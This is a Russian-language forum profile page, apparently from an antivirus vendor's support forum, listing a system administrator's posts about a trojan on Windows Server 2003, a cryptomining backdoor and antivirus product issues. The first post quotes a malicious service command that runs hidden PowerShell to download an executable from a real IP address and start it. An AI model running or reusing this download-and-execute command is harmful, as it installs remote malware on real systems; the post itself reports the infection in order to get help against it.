Jump to content

AleckK

Members
  • Content Count

    36
  • Joined

  • Last visited

About AleckK

  • Rank
    Candidate

Recent Profile Visitors

138 profile views
  1. Есть ли информация по трояну? Не могу отследить откуда он срабатывает и какой механизм использует. В интернете никакой информации. Пока замечено только на Windows 2003. Kaspersky Security 10.1 для Windows Server ничего не видит и не отлавливает. В службах создаются со случайным наборов букв несколько десятков служб типа ABvYIW ..... zzCyfQ. В службе - выполнение скрипта powershell, в 2003 конечно же он не срабатывает из-за отсутствия powershell. cmd /c powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX (New-Object Net.WebClient).DownloadFile('http://91.211.88.100/nw.exe','C:\Users\Public\nw.exe');Start-Process C:\Users\Public\nw.exe Хотел сам скачать этот файл и его проверить антивирусом, но сайт не отвечает, файл недоступен. Понимаю, что в будущем ничто не мешает этому файлу появиться.
  2. Отключите экспорт ключей в КСЦ. Филиалов много, админов много, подчиненных серверов много. Нет гарантии, что какой-нибудь админ не упрет себе ключ. На уровне безопасности запретить невозможно: локальный администратор всегда может изменить себе права безопасности и получить доступ в "ключи".
  3. Ну что, отлично работает сервер, никаких сбоев. Радует, что ресурсов по памяти намного меньше тратит, этого и хотели добиться изначально. По другим ресурсам улучшений не заметил, но и ухудшений точно нет. Будем потихоньку менять на всех остальных серверах. PS. Жалко только, что в нем нет защиты от сетевых атак.
  4. Скорее всего так и произойдет, сейчас пока послежу за работой рабочего сервера.
  5. На рабочем сервере не 2012, туда WSEE встал без проблем. Посмотрим, как он будет себя вести, но первое впечатление хорошее (на порядок меньше ресурсов съедает). Спасибо за помощь!
  6. Лицензия подошла, значит позволяет. Установил на тестовый сервер: "Постоянная защита файлов - завершена с ошибкой" Произошла внутренняя ошибка задачи. Код ошибки: 0x0007. Код подсистемы: 0x6 (WP). Дополнительные сведения можно найти на сайте Службы технической поддержки "Лаборатории Касперского": http://support.kaspersky.ru/error_prod?key=B6X7X13X20X. Рекомендации по ссылке не помогли. Подика не поддерживает Windows 2012 R2? Нельзя все таки выключить процессы у пользователей в KES?
  7. На терминальном сервере плодятся для каждого пользователя процессы avp.exe. Как их убрать? Сейчас стоит KES 10, раньше эта проблема в KAV 6 решалась путем выключения интерфейса взаимодействия с пользователем. В KES 10 это не помогает, значок исчезает, но процессы все равно остаются.
  8. Уже отправляли. Ситуация такая: Большая корпоративная сеть. Кто то где то кому то, может специально, может нет, дает файлик 1.ехе. Может люди сами где его нечаянно тыкнут. Но в итоге эта программа внедряется в винду, грузит проц на 100% под службой spoolv.exe и зарабатывает кому то криптовалюту. В масштабах большой сети бороться с этим очень тяжело.
  9. Это понятно. Онлайн проверка ДрВеба видит этот файлик так: Проверка: 1.exe Версия антивирусного ядра: 7.0.5.6250 Вирусных записей: 4456640 Размер файла: 1071.57 КБ MD5 файла: cb510fe6a4bfc93f1d67ec3b48de905a 1.exe - archive RAR >1.exe/aliases.ini - Ok >1.exe/ccc.mrc - Ok >1.exe/control.ini - Ok >1.exe/id.txt - Ok >1.exe/mirc.ico - Ok >1.exe/mirc.ini - Ok >1.exe/postcard.gif - Ok >1.exe/remote.ini - Ok >1.exe/servers.ini - Ok >1.exe/users.ini - Ok >1.exe/expIorer.exe infected with BackDoor.IRC.based >1.exe/sup.reg - Ok >1.exe/sup.bat - Ok
  10. Да и KES как то странно его видит. Не считает его угрозой. Не удаляет. Но он хоть при принудительной проверке пишет, что найдено это, а KAV даже при принудительной проверке не видит его никак.
  11. KAV 6.0.4.1611 с новыми базами не видит угрозу: not-a-virus:Client-IRC.Win32.mIRC.60 KES 10.1.0.867 с новыми базами видит. Так и задумано? Обновление через KSC, который выкачивает все типы баз.
  12. да, пробовал. все равно распаковывалось с ошибками.
×
×
  • Create New...

Important Information

We use cookies to make your experience of our websites better. By using and further navigating this website you accept this. Detailed information about the use of cookies on this website is available by clicking on more information.